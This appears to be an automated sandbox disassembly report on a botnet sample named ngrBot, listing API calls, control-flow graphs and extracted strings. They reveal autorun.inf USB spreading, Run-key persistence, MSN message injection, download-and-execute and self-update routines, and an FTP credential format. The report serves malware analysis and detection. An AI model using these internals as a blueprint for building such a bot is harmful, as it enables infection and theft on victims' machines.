                                                                  control_flow_graph 712 3e0430-3e049e lstrlenA GetProcessHeap HeapAlloc memset GetProcessHeap 713 3e04a4-3e04b8 lstrcpyA 712->713 714 3e07c2-3e07ca 712->714 715 3e04be-3e04d0 sscanf 713->715 716 3e0695-3e06ab sscanf 713->716 717 3e04d6-3e04e6 strstr 715->717 718 3e0792-3e07a6 HeapFree 715->718 716->718 719 3e06b1-3e06c3 strstr 716->719 717->718 720 3e04ec-3e050f lstrlenA * 2 HeapAlloc 717->720 723 3e07ae-3e07b0 718->723 724 3e07a8-3e07ac HeapFree 718->724 721 3e078f 719->721 722 3e06c9-3e06df strstr 719->722 720->718 727 3e0515-3e0528 strtok 720->727 721->718 722->721 728 3e06e5-3e070a lstrlenA * 2 HeapAlloc 722->728 725 3e07b8-3e07c1 723->725 726 3e07b2-3e07b6 HeapFree 723->726 724->723 726->725 727->718 729 3e052e-3e053a lstrcpyA 727->729 728->721 730 3e0710-3e0756 lstrlenA * 2 lstrcpynA lstrlenA * 2 HeapAlloc 728->730 731 3e0540-3e0549 729->731 730->721 732 3e0758-3e078c lstrlenA * 2 _snprintf 730->732 733 3e054f-3e0561 _memicmp 731->733 734 3e05fb-3e060f strtok 731->734 732->721 736 3e058b-3e05a0 _memicmp 733->736 737 3e0563-3e0589 lstrlenA _snprintf 733->737 734->731 735 3e0615 734->735 738 3e062d-3e0672 lstrlenA _snprintf lstrlenA * 2 HeapAlloc 735->738 740 3e05a2-3e05ae lstrcatA 736->740 741 3e05b0-3e05c5 _memicmp 736->741 739 3e05ef-3e05f3 lstrcatA 737->739 738->721 743 3e0678-3e0690 _snprintf 738->743 742 3e05f8-3e05f9 lstrcatA 739->742 740->742 744 3e05c7-3e05d3 lstrcatA 741->744 745 3e05d5-3e05ea _memicmp 741->745 742->734 743->721 744->742 746 3e05ec 745->746 747 3e0617-3e062b lstrcatA * 3 745->747 746->739 747->738
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,00000000,00000000,756F59EB), ref: 003E0446
                                                                  • GetProcessHeap.KERNEL32(00000008,00000001), ref: 003E044C
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 003E0453
                                                                  • memset.MSVCRT(?,00000000,00000103), ref: 003E048B
                                                                  • GetProcessHeap.KERNEL32 ref: 003E0493
                                                                  • lstrcpyA.KERNEL32(00000000,?), ref: 003E04A9
                                                                  • sscanf.MSVCRT(00000000,SDG %d,?), ref: 003E04C5
                                                                  • strstr.MSVCRT(00000000,X-MMS-IM-Format: ), ref: 003E04DC
                                                                  • lstrlenA.KERNEL32(003D2780), ref: 003E04F0
                                                                  • lstrlenA.KERNEL32(?), ref: 003E04FA
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000000), ref: 003E0505
                                                                  • strtok.MSVCRT(00000000,003E2B84), ref: 003E051B
                                                                  • lstrcpyA.KERNEL32(00000000,003E1335), ref: 003E0534
                                                                  • _memicmp.MSVCRT(00000000,Content-Length: ,00000010), ref: 003E0557
                                                                  • lstrlenA.KERNEL32(003D2780), ref: 003E0567
                                                                  • _snprintf.MSVCRT(?,00000103,Content-Length: %d,00000000), ref: 003E057B
                                                                  • _memicmp.MSVCRT(00000000,From: ,00000006), ref: 003E0596
                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 003E05A7
                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 003E05F1
                                                                  • lstrcatA.KERNEL32(00000000,003E2B84), ref: 003E05F9
                                                                  • strtok.MSVCRT(00000000,003E2B84), ref: 003E0602
                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 003E061C
                                                                  • lstrcatA.KERNEL32(00000000,), ref: 003E0624
                                                                  • lstrcatA.KERNEL32(00000000,003D2780), ref: 003E062B
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003E062E
                                                                  • _snprintf.MSVCRT(?,00000103,SDG %d %d,?,00000000), ref: 003E0646
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003E064F
                                                                  • lstrlenA.KERNEL32(?), ref: 003E065A
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000040), ref: 003E0667
                                                                  • _snprintf.MSVCRT(00000000,0000003F,%s%s,?,00000000), ref: 003E0688
                                                                  • sscanf.MSVCRT(00000000,MSG %d %1s,?,?), ref: 003E06A0
                                                                  • strstr.MSVCRT(00000000,003E2B84), ref: 003E06B7
                                                                  • strstr.MSVCRT(-00000002,), ref: 003E06D2
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003E06E6
                                                                  • lstrlenA.KERNEL32(-00000002), ref: 003E06F3
                                                                  • HeapAlloc.KERNEL32(?,00000008,?), ref: 003E06FF
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003E0714
                                                                  • lstrlenA.KERNEL32(-00000002), ref: 003E0721
                                                                  • lstrcpynA.KERNEL32(?,-00000002,?), ref: 003E072C
                                                                  • lstrlenA.KERNEL32(?), ref: 003E0736
                                                                  • lstrlenA.KERNEL32(003D2780), ref: 003E073E
                                                                  • HeapAlloc.KERNEL32(?,00000008,?), ref: 003E074B
                                                                  • lstrlenA.KERNEL32(?,?,003D2780), ref: 003E0761
                                                                  • lstrlenA.KERNEL32(003D2780), ref: 003E076A
                                                                  • _snprintf.MSVCRT(?,?,MSG %d %s %d%s%s,?,?,00000004), ref: 003E0787
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003E079F
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 003E07AC
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003E07B6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$Heap$lstrcat$Alloc$_snprintf$Freestrstr$Process_memicmplstrcpysscanfstrtok$lstrcpynmemset
                                                                  • String ID: $%s%s$Content-Length: $Content-Length: %d$From: $MSG %d %1s$MSG %d %s %d%s%s$Reliability: $SDG $SDG $SDG %d$SDG %d %d$X-MMS-IM-Format:
                                                                  • API String ID: 375969099-2909086048
                                                                  • Opcode ID: 8e4aaa25985d45d3c9f33ae9983cd7aa8fc701ffcb7b115daf8045c5c1e477cb
                                                                  • Instruction ID: f75678f3bf4e7efd488b6e5a5bde3193d2a1c1f32a94ec1262152e95b8d4ec40
                                                                  • Opcode Fuzzy Hash: 8e4aaa25985d45d3c9f33ae9983cd7aa8fc701ffcb7b115daf8045c5c1e477cb
                                                                  • Instruction Fuzzy Hash: 54A141B5A00269BBDB16DBA68C85EFF777CEB48700F044655F904A72C1EAB4DE408B60
                                                                  Function 003DF430 Relevance: 96.7, APIs: 47, Strings: 8, Instructions: 431filestringsleepCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 748 3df430-3df62e call 3e0f10 memset * 11 sprintf * 2 wsprintfW sprintf * 3 wsprintfW * 2 call 3d1cf0 753 3df630-3df643 call 3d1ea0 748->753 754 3df672-3df6b2 SetFileAttributesA * 3 CreateDirectoryA 748->754 753->754 762 3df645-3df655 _stricmp 753->762 755 3df6b4-3df6bf GetLastError 754->755 756 3df6c1-3df6d6 CopyFileW 754->756 755->756 758 3df669-3df671 755->758 756->758 759 3df6d8-3df706 lstrlenA call 3d1c50 call 3d7700 756->759 767 3df70c-3df733 call 3d35f0 759->767 768 3df8c2-3df8d0 Sleep 759->768 762->754 764 3df657-3df667 _stricmp 762->764 764->754 764->758 779 3df735-3df73e 767->779 780 3df740-3df747 CreateFileW 767->780 770 3df8e5-3df8eb 768->770 771 3df8d2-3df8d8 768->771 775 3df8ed-3df8f6 770->775 776 3df903-3df909 770->776 773 3df8f8-3df900 771->773 774 3df8da-3df8e3 771->774 781 3df901 SetFileAttributesA 773->781 774->781 775->781 777 3df91e-3df924 776->777 778 3df90b-3df911 776->778 784 3df93c-3df962 call 3df130 777->784 785 3df926-3df92f 777->785 782 3df931-3df939 778->782 783 3df913-3df91c 778->783 786 3df74d-3df751 779->786 780->786 781->776 788 3df93a SetFileAttributesA 782->788 783->788 795 3df964-3df98d CreateFileA GetFileSize LockFile 784->795 796 3df993-3df9a3 call 3d7700 784->796 785->788 786->758 787 3df757-3df78e 786->787 791 3df792-3df79f 787->791 788->784 793 3df7bb-3df7d0 791->793 794 3df7a1-3df7b9 call 3d3870 791->794 798 3df821-3df82e lstrlenA 793->798 799 3df7d2-3df81f lstrcpyA lstrcatA * 2 lstrlenA 793->799 794->793 795->796 805 3df9a5-3df9ce CreateFileA GetFileSize LockFile 796->805 806 3df9d4-3df9df 796->806 802 3df834-3df84f WriteFile call 3d3870 798->802 799->802 808 3df856-3df85b 802->808 809 3df851-3df855 802->809 805->806 810 3df85d 808->810 811 3df8a6-3df8aa 808->811 809->808 814 3df860-3df898 call 3df3b0 lstrlenA WriteFile call 3d3870 810->814 812 3df790 811->812 813 3df8b0-3df8c0 CloseHandle 811->813 812->791 813->768 819 3df89f-3df8a4 814->819 820 3df89a-3df89e 814->820 819->811 819->814 820->819
                                                                  APIs
                                                                  • memset.MSVCRT ref: 003DF459
                                                                  • memset.MSVCRT(?,00000000,00000103), ref: 003DF472
                                                                  • memset.MSVCRT(?,00000000,00000103,?,00000000,00000103), ref: 003DF48B
                                                                  • memset.MSVCRT(?,00000000,000003FF,?,00000000,00000103,?,00000000,00000103), ref: 003DF4A4
                                                                  • memset.MSVCRT(?,00000000,000003FF,?,00000000,000003FF,?,00000000,00000103,?,00000000,00000103), ref: 003DF4BD
                                                                  • memset.MSVCRT(?,00000000,00000103,?,00000000,000003FF,?,00000000,000003FF,?,00000000,00000103,?,00000000,00000103), ref: 003DF4D6
                                                                  • memset.MSVCRT ref: 003DF4F2
                                                                  • memset.MSVCRT(?,00000000,00000103), ref: 003DF50B
                                                                  • memset.MSVCRT(?,00000000,0000040E,?,00000000,00000103), ref: 003DF526
                                                                  • memset.MSVCRT(?,00000000,0000040E,?,00000000,0000040E,?,00000000,00000103), ref: 003DF541
                                                                  • memset.MSVCRT(?,00000000,00000206,?,00000000,0000040E,?,00000000,0000040E,?,00000000,00000103), ref: 003DF55C
                                                                  • sprintf.MSVCRT(?,%sautorun.inf,?,?,00000000,00000206,?,00000000,0000040E,?,00000000,0000040E,?,00000000,00000103), ref: 003DF571
                                                                  • sprintf.MSVCRT(?,%sautorun.tmp,?), ref: 003DF586
                                                                  • wsprintfW.USER32(?,003E3018,?,?,%sautorun.tmp,?), ref: 003DF5A4
                                                                  • sprintf.MSVCRT(?,%s\%s,0041BDB0,0041BEB4), ref: 003DF5BC
                                                                  • sprintf.MSVCRT(?,%s%s,?,0041BDB0,?,%s\%s,0041BDB0,0041BEB4), ref: 003DF5D3
                                                                  • sprintf.MSVCRT(?,%s%s,?,?,?,%s%s,?,0041BDB0,?,%s\%s,0041BDB0,0041BEB4), ref: 003DF5EC
                                                                  • wsprintfW.USER32(?,003E3018,?), ref: 003DF607
                                                                  • wsprintfW.USER32(?,%S%S\Desktop.ini,?,0041BDB0), ref: 003DF61B
                                                                    • Part of subcall function 003D1CF0: GetFileAttributesW.KERNEL32(?), ref: 003D1CF7
                                                                  • _stricmp.MSVCRT(00000000,ERR), ref: 003DF64B
                                                                  • _stricmp.MSVCRT(0041A920,00000000), ref: 003DF65D
                                                                  • SetFileAttributesA.KERNEL32(?,00000080), ref: 003DF684
                                                                  • SetFileAttributesA.KERNEL32(?,00000080), ref: 003DF692
                                                                  • SetFileAttributesA.KERNEL32(?,00000080), ref: 003DF6A0
                                                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 003DF6AA
                                                                  • GetLastError.KERNEL32 ref: 003DF6B4
                                                                  • CopyFileW.KERNEL32(0041B9A0,?,00000000), ref: 003DF6CE
                                                                  • lstrlenA.KERNEL32([.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E},00000000), ref: 003DF6DE
                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 003DF747
                                                                  • lstrcpyA.KERNEL32(?,00003E2F), ref: 003DF7DA
                                                                  • lstrcatA.KERNEL32(?,?), ref: 003DF7EE
                                                                    • Part of subcall function 003D1EA0: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,08000000,00000000), ref: 003D1ECD
                                                                    • Part of subcall function 003D1EA0: GetLastError.KERNEL32 ref: 003D1EDA
                                                                  • lstrcatA.KERNEL32(?,003E2B84), ref: 003DF800
                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 003DF813
                                                                  • lstrlenA.KERNEL32(00003E2F,?,00000000), ref: 003DF828
                                                                  • WriteFile.KERNEL32(00000000,00003E2F,00000000), ref: 003DF837
                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 003DF87C
                                                                  • WriteFile.KERNEL32(00000000,?,00000000), ref: 003DF88B
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003DF8B1
                                                                  • Sleep.KERNEL32(00000032), ref: 003DF8C4
                                                                  • SetFileAttributesA.KERNEL32(?,00000004), ref: 003DF901
                                                                  • SetFileAttributesA.KERNEL32(?,00000004), ref: 003DF93A
                                                                  • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 003DF97D
                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 003DF984
                                                                  • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 003DF98D
                                                                  • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 003DF9BE
                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 003DF9C5
                                                                  • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 003DF9CE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: File$memset$Attributes$Createsprintf$lstrlen$wsprintf$ErrorLastLockSizeWrite_stricmplstrcat$CloseCopyDirectoryHandleSleeplstrcpy
                                                                  • String ID: %S%S\Desktop.ini$%s%s$%s\%s$%sautorun.inf$%sautorun.tmp$ERR$[.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E}$usbi
                                                                  • API String ID: 2867265384-3663527224
                                                                  • Opcode ID: 58c423a86e168dfa74826abf25369916911a66ac0c722bfa77702ed0d3dc4301
                                                                  • Instruction ID: 0a5726852eabc200df7fdd4edabc418808c1cf3a77b0e7399d539f7de6605f01
                                                                  • Opcode Fuzzy Hash: 58c423a86e168dfa74826abf25369916911a66ac0c722bfa77702ed0d3dc4301
                                                                  • Instruction Fuzzy Hash: 17E1D872940268BAD732D760DCC5FEA777CEB58740F0046A6F609A61C1D7B0AB84CFA5
                                                                  Function 003DE9F0 Relevance: 75.5, APIs: 31, Strings: 12, Instructions: 271stringfilethreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,00000103), ref: 003DEA0F
                                                                  • LoadLibraryW.KERNEL32(ws2_32.dll), ref: 003DEA22
                                                                  • LoadLibraryW.KERNEL32(secur32.dll), ref: 003DEA29
                                                                  • LoadLibraryW.KERNEL32(wininet.dll), ref: 003DEA30
                                                                  • CreateMutexA.KERNEL32(00000000,00000000,003E57AC), ref: 003DEA3B
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 003DEA44
                                                                    • Part of subcall function 003D7330: memset.MSVCRT(?,00000000,000001FF), ref: 003D7351
                                                                    • Part of subcall function 003D7330: lstrlenA.KERNEL32(?), ref: 003D7369
                                                                    • Part of subcall function 003D7330: _snprintf.MSVCRT(00000000,000001FE,%s_,?), ref: 003D7381
                                                                    • Part of subcall function 003D7330: _vsnprintf.MSVCRT(00000000,000001FE,003E0AAD,?), ref: 003D73A3
                                                                    • Part of subcall function 003D7330: lstrlenA.KERNEL32(00000000), ref: 003D73B2
                                                                  • CopyFileW.KERNEL32(0041AFB0,0041ADA0,00000000), ref: 003DEACF
                                                                    • Part of subcall function 003DD6B0: RegSetValueExW.ADVAPI32(?,?,00000000,00000001,?,?), ref: 003DD731
                                                                    • Part of subcall function 003DD6B0: RegCloseKey.ADVAPI32(?), ref: 003DD740
                                                                  • Sleep.KERNEL32(000003E8), ref: 003DEAFC
                                                                    • Part of subcall function 003D1AD0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 003D1AE9
                                                                  • DeleteFileW.KERNEL32(0041AFB0), ref: 003DEB2F
                                                                  • Sleep.KERNEL32(00003A98), ref: 003DEB3A
                                                                  • DeleteFileW.KERNEL32(0041AFB0), ref: 003DEB41
                                                                  • lstrcpyA.KERNEL32(0041A920,ERR), ref: 003DEB61
                                                                  • lstrlenA.KERNEL32(003E57C0), ref: 003DEB72
                                                                  • lstrlenA.KERNEL32(003E57C0), ref: 003DEBB5
                                                                  • _snprintf.MSVCRT(00000000,00000103,003E2B10,00000539), ref: 003DEBDE
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003DEC15
                                                                  • InitializeCriticalSection.KERNEL32(0041B3C8), ref: 003DEC32
                                                                  • memset.MSVCRT(?,00000000,00000206,0041A6E0,00407A80,00000001), ref: 003DEC5F
                                                                  • wsprintfW.USER32(?,%s:Zone.Identifier,0041ADA0,?,00000000,00000206,0041A6E0,00407A80,00000001), ref: 003DEC75
                                                                  • DeleteFileW.KERNEL32(?), ref: 003DEC95
                                                                  • GetLastError.KERNEL32 ref: 003DEC97
                                                                    • Part of subcall function 003D1CF0: GetFileAttributesW.KERNEL32(?), ref: 003D1CF7
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000E880,00000000,00000000,00000000), ref: 003DECB2
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003DECBB
                                                                  • CreateThread.KERNEL32(00000000,00000000,003DE990,00000000,00000000,00000000), ref: 003DECCC
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003DECCF
                                                                  • lstrlenA.KERNEL32(0041B3E0), ref: 003DED26
                                                                  • lstrlenA.KERNEL32(0041AC50,?,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00000000), ref: 003DED5E
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000E770,0041B990,00000000,00000000,?,0041AC50,00000000), ref: 003DED83
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003DED86
                                                                  • CreateThread.KERNEL32(00000000,00000000,003DFC90,00000000,00000000,00000000), ref: 003DEDA1
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003DEDA4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$File$CloseCreate$HandleThread$DeleteLibraryLoadmemset$SleepTime_snprintf$AttributesCopyCriticalErrorInitializeLastMutexObjectSectionSingleSystemValueWait_vsnprintflstrcpywsprintf
                                                                  • String ID: %s:Zone.Identifier$ERR$IPC_Check$Software\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run$msnint$msnmsg$ngrBot$running$secur32.dll$wininet.dll$ws2_32.dll
                                                                  • API String ID: 4164503275-3436408089
                                                                  • Opcode ID: 0faceb84deae9a6da616910233e1e3cade944cec690d84d41e55496dcbcd1289
                                                                  • Instruction ID: 5d51e2f24f6ad0010dcb5d25a63d436741d9f98e9af8f0afaaed244d737e3d85
                                                                  • Opcode Fuzzy Hash: 0faceb84deae9a6da616910233e1e3cade944cec690d84d41e55496dcbcd1289
                                                                  • Instruction Fuzzy Hash: 8981D8B6B8136476E63277A1BC47FDB3A1C9B40F14F144113FA057E2C2DAF46A9085AE
                                                                  Function 003DE130 Relevance: 59.8, APIs: 24, Strings: 10, Instructions: 255sleepstringfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(0041B3C8), ref: 003DE14B
                                                                    • Part of subcall function 003D9FF0: strtok.MSVCRT(?,?,0000002C), ref: 003DA013
                                                                    • Part of subcall function 003D9FF0: strtok.MSVCRT(00000000,?), ref: 003DA04F
                                                                  • GetLastError.KERNEL32 ref: 003DE17E
                                                                  • GetLastError.KERNEL32 ref: 003DE18B
                                                                  • GetLastError.KERNEL32 ref: 003DE198
                                                                  • GetLastError.KERNEL32 ref: 003DE1A5
                                                                  • Sleep.KERNEL32(00003A98), ref: 003DE1C8
                                                                  • Sleep.KERNEL32(000003E8), ref: 003DE22B
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003DE24D
                                                                  • _memicmp.MSVCRT(?,00000000,00000000), ref: 003DE259
                                                                  • MoveFileExW.KERNEL32(00000000,0041ADA0,0000000B), ref: 003DE292
                                                                  • MoveFileExW.KERNEL32(00000000,0041ADA0,00000004), ref: 003DE2A4
                                                                  • lstrcpyA.KERNEL32(0041A920,00000000), ref: 003DE2C0
                                                                  • lstrcmpA.KERNEL32(?,003E2C7C), ref: 003DE2D3
                                                                  • Sleep.KERNEL32(000007D0), ref: 003DE2FA
                                                                  • Sleep.KERNEL32(000007D0), ref: 003DE30A
                                                                    • Part of subcall function 003DBA00: memset.MSVCRT(?,00000000,000007FF), ref: 003DBA1E
                                                                    • Part of subcall function 003DBA00: wvsprintfA.USER32(00000000,00000000,00000000), ref: 003DBA42
                                                                  • DeleteFileW.KERNEL32(00000000), ref: 003DE43A
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 003DE45D
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 003DE46B
                                                                  • LeaveCriticalSection.KERNEL32(0041B3C8), ref: 003DE478
                                                                  Strings
                                                                  • bsod, xrefs: 003DE312
                                                                  • [d="%s"] Error downloading file [e="%d"], xrefs: 003DE405
                                                                  • [d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d, xrefs: 003DE41C
                                                                  • [d="%s"] Error getting temporary filename. [e="%d"], xrefs: 003DE3D1
                                                                  • rebooting, xrefs: 003DE2DE
                                                                  • [d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"], xrefs: 003DE36E
                                                                  • QUIT :%s, xrefs: 003DE2E3
                                                                  • [d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s), xrefs: 003DE359
                                                                  • [d="%s"] Error writing download to "%S" [e="%d"], xrefs: 003DE383, 003DE3AE
                                                                  • [d='%s"] Error getting application data path [e="%d"], xrefs: 003DE3F4
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastSleep$File$CriticalMoveSectionstrtok$??3@DeleteEnterFreeHeapLeave_memicmplstrcmplstrcpylstrlenmemsetwvsprintf
                                                                  • String ID: QUIT :%s$[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]$[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)$[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d$[d="%s"] Error downloading file [e="%d"]$[d="%s"] Error getting temporary filename. [e="%d"]$[d="%s"] Error writing download to "%S" [e="%d"]$[d='%s"] Error getting application data path [e="%d"]$bsod$rebooting
                                                                  • API String ID: 4206007775-4213298338
                                                                  • Opcode ID: 0e9d9c51ff963f0392174dedffd301eadbf14d2fb655b5940513456a4b9f5e73
                                                                  • Instruction ID: 490be749f232fd2a6582744e297119379c2f44e78112a04a2e3d0c3ca944d5ef
                                                                  • Opcode Fuzzy Hash: 0e9d9c51ff963f0392174dedffd301eadbf14d2fb655b5940513456a4b9f5e73
                                                                  • Instruction Fuzzy Hash: 1F81D5B6A00254FBD723BBA5EC4AEBE7B7CEF44710F10461BF9119A3D1D77099409A22
                                                                  Function 003DDDB0 Relevance: 56.3, APIs: 20, Strings: 12, Instructions: 281sleepstringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(0041B3C8), ref: 003DDDCF
                                                                    • Part of subcall function 003D9FF0: strtok.MSVCRT(?,?,0000002C), ref: 003DA013
                                                                    • Part of subcall function 003D9FF0: strtok.MSVCRT(00000000,?), ref: 003DA04F
                                                                  • strstr.MSVCRT(00000000,http://), ref: 003DDDF4
                                                                  • lstrlenA.KERNEL32(?), ref: 003DDE11
                                                                  • toupper.MSVCRT(00000000), ref: 003DDE28
                                                                  • GetLastError.KERNEL32 ref: 003DDE68
                                                                  • GetLastError.KERNEL32 ref: 003DDE71
                                                                  • GetLastError.KERNEL32 ref: 003DDE7A
                                                                  • GetLastError.KERNEL32 ref: 003DDE83
                                                                  • Sleep.KERNEL32(00003A98), ref: 003DDEA8
                                                                  • Sleep.KERNEL32(000003E8), ref: 003DDF16
                                                                  • _stricmp.MSVCRT(?,00000000), ref: 003DDF3D
                                                                  • Sleep.KERNEL32(00000032), ref: 003DDF6A
                                                                  • GetLastError.KERNEL32([d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"],?,?,?,00000000), ref: 003DE021
                                                                  • GetLastError.KERNEL32 ref: 003DE059
                                                                  • GetLastError.KERNEL32([d="%s" s="%d bytes"] Error creating process "%S" [e="%d"],?,?,?,00000000), ref: 003DE037
                                                                    • Part of subcall function 003DBA00: memset.MSVCRT(?,00000000,000007FF), ref: 003DBA1E
                                                                    • Part of subcall function 003DBA00: wvsprintfA.USER32(00000000,00000000,00000000), ref: 003DBA42
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 003DE0DD
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 003DE0EB
                                                                  • LeaveCriticalSection.KERNEL32(0041B3C8), ref: 003DE0F8
                                                                  Strings
                                                                  • ERR, xrefs: 003DDFEC
                                                                  • [d="%s"] Error downloading file [e="%d"], xrefs: 003DE08E
                                                                  • [d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d, xrefs: 003DE0A5
                                                                  • [d="%s"] Error getting temporary filename. [e="%d"], xrefs: 003DE060
                                                                  • [d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"], xrefs: 003DE017
                                                                  • [d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s), xrefs: 003DDFFE
                                                                  • http://, xrefs: 003DDDEE
                                                                  • dlds, xrefs: 003DDE44, 003DDFA6
                                                                  • [d="%s"] Error writing download to "%S" [e="%d"], xrefs: 003DE042
                                                                  • [d="%s" s="%d bytes"] Error creating process "%S" [e="%d"], xrefs: 003DE030
                                                                  • [d='%s"] Error getting application data path [e="%d"], xrefs: 003DE080
                                                                  • exe, xrefs: 003DDEE4
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$Sleep$CriticalSectionstrtok$??3@EnterFreeHeapLeave_stricmplstrlenmemsetstrstrtoupperwvsprintf
                                                                  • String ID: ERR$[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)$[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]$[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d$[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]$[d="%s"] Error downloading file [e="%d"]$[d="%s"] Error getting temporary filename. [e="%d"]$[d="%s"] Error writing download to "%S" [e="%d"]$[d='%s"] Error getting application data path [e="%d"]$dlds$exe$http://
                                                                  • API String ID: 3190375853-4059846736
                                                                  • Opcode ID: df9f295c966f5122ae8880055d8a3ad4f4780dd40f285b2b4b70f16d04ad65de
                                                                  • Instruction ID: da9e554250a5beb64ee5585cb3669c64554f1c745a9bb4d3e95b0bb81093c846
                                                                  • Opcode Fuzzy Hash: df9f295c966f5122ae8880055d8a3ad4f4780dd40f285b2b4b70f16d04ad65de
                                                                  • Instruction Fuzzy Hash: 6291C2B6A00244ABD712DB95EC86ABFB7BDEB94700F11451AF9069B3C1D770EE40C761
                                                                  Function 003D7870 Relevance: 49.2, APIs: 11, Strings: 17, Instructions: 249stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,000001FF,?,00000000,?), ref: 003D7898
                                                                  • lstrlenA.KERNEL32(-00000005,00000000,00000000,?,?,?,00000000,?), ref: 003D795D
                                                                  • _snprintf.MSVCRT(0041A2B0,000001FF,003E13EC,-00000005,?,?,00000000,?), ref: 003D797B
                                                                  • _snprintf.MSVCRT(0041A4B0,000001FF,003E13EC,-00000005,?,?,00000000,?), ref: 003D79B7
                                                                  • lstrlenA.KERNEL32(0041A2B0,?,00000000,?), ref: 003D7A5A
                                                                  • lstrlenA.KERNEL32(0041A4B0), ref: 003D7A69
                                                                  • _snprintf.MSVCRT(00000000,000001FF,ftp://%s:%s@%s:%d,0041A2B0,0041A4B0,00000000,00000000), ref: 003D7AD9
